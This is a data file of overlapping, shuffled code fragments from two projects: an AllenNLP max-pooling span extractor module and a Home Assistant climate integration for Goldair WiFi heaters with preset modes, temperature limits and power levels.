span_indices_mask is", "-> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in", "is not None: raise ConfigurationError( \"To use a span width embedding representation, you", "from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self,", "= torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: # Embed the", "# Embed the span widths and concatenate to the rest of the representations.", "span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 
span_embeddings = span_embeddings", "Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding", "span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span width embedding representation,", "both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int:", "is not None: # It's not strictly necessary to multiply the span indices", "span representation was padded with something other # than 0 (such as -1,", "-1, which would be an invalid index), so we do so anyway to", "anyway to # be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends", "# be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask", "int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool = False,", "span_indices_mask is not None: # It's not strictly necessary to multiply the span", "0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings,", "= bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding", "None: # It's not strictly necessary to multiply the span indices by the", "from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from", "import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import", "self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim", "the span indices by the mask here, # but it's 
possible that the", "# span_mask if self._span_width_embedding is not None: # Embed the span widths and", "return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices:", "if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def", "span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0]", "self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not", "= None, span_width_embedding_dim: int = None, bucket_widths: bool = False, ) -> None:", ") -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths", "not None: # Embed the span widths and concatenate to the rest of", "not None: raise ConfigurationError( \"To use a span width embedding representation, you must\"", "and concatenate to the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values(", "Embed the span widths and concatenate to the rest of the representations. 
if", "allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int =", "if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths =", "is not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim", "= self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return", ") -> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index", "import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import", "embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is not None: raise", "from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int", "None: raise ConfigurationError( \"To use a span width embedding representation, you must\" \"specify", "(such as -1, which would be an invalid index), so we do so", "= span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width,", "emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings", "# shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)]", "the rest of the representations. 
if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts,", "self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings", "raise ConfigurationError( \"To use a span width embedding representation, you must\" \"specify both", "span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set", "span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None:", "self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim", "self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int:", "[batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings", "is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not", "= None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim = input_dim", "not None: # It's not strictly necessary to multiply the span indices by", "max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0", "rest of the representations. 
if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings", "num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not", "= None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if", "span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None:", "span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding", "Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is not", "span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask", "self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward(", "safe. 
span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size,", "num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is not None:", "= util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings *", "int = None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim =", "bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings =", "span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def", "was padded with something other # than 0 (such as -1, which would", "that the span representation was padded with something other # than 0 (such", "allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor):", ") elif num_width_embeddings is not None or span_width_embedding_dim is not None: raise ConfigurationError(", "return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor =", "0 (such as -1, which would be an invalid index), so we do", "-> int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim", "width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding", "None: # Embed the span widths and concatenate to the rest of the", "to # be safe. 
span_starts = span_starts * span_indices_mask span_ends = span_ends *", "= span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if", "as -1, which would be an invalid index), so we do so anyway", "index), so we do so anyway to # be safe. span_starts = span_starts", "span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() #", ") else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings,", "span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1)", "the mask here, # but it's possible that the span representation was padded", "is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self,", "input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and", "get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not", "do so anyway to # be safe. span_starts = span_starts * span_indices_mask span_ends", "torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None: #", "[batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not", "SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError" ]
[]
[ "power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode", "not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if", "def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self,", "ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER", "'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID", "= { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO:", "# _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending", "return None @property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return", "None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode):", "def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self,", "PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2',", "PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property", "'max': 21 } } # self._model = model # _LOGGER.info(f'Setting model to {model}')", "\"\"\"Set new power level.\"\"\" new_level = swing_mode if 
new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise", "= 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco'", "swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return", "@property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def", "def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new", "of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\"", "temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the", "'1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101',", "'5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class", "set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def", "== STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported", "minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None", "ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE =", "'104', ATTR_POWER_MODE: '105', 
ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE:", "return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self,", "self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new", "else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def", "ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON:", "dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode from api status.", "list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode from", "swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level =", "self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property", "return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return", "+ ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID =", "min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min']", "!= STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target", "@property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return 
self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return", "the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return", "if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def", "21 } } # self._model = model # _LOGGER.info(f'Setting model to {model}') @property", "ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF:", "WiFi Heater device. \"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE,", "ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE", "PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\"", "\"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE])", "'3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE", "self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the", "return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if", "self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self):", "temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and", 
"STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE:", "= 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1',", "return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\"", "= self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return", "Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise", "} SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a", "must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE],", "new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current", "'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2',", "import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import", "Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE,", "GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5',", "'106' } HVAC_MODE_TO_DPS_MODE = { 
HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = {", "= 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO:", "self._model = model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the", "'12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270", "unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try", "target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None:", "features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property", "= 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE", "= 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON =", "ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return", "\"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\"", "dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode", "the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie", "STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF,", "of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature 
we try to", "of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of", "modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode]", "'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO", "= self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in", "= self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE", "PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE,", "None @property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys())", "\"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return the name of", "SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature'", "STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE:", "new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}')", "= int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set", "device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit", "ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, 
SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER =", "{ STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max':", "preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power", "def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def", "api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode =", "step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\"", "dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO:", "'3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE |", "not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be", "to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode", "True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL", "ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR", "dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys())", "HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } 
PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C',", "the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif", "target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]}", "self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode", "= 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE:", "'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 } } # self._model", "dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list of available preset", "(str): The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device", "is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode", "self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature))", "\"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. 
Args:", "HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE:", "self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the", "hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self):", "= self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load", "self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs):", "@property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set", "the heater. Args: name (str): The device's name. 
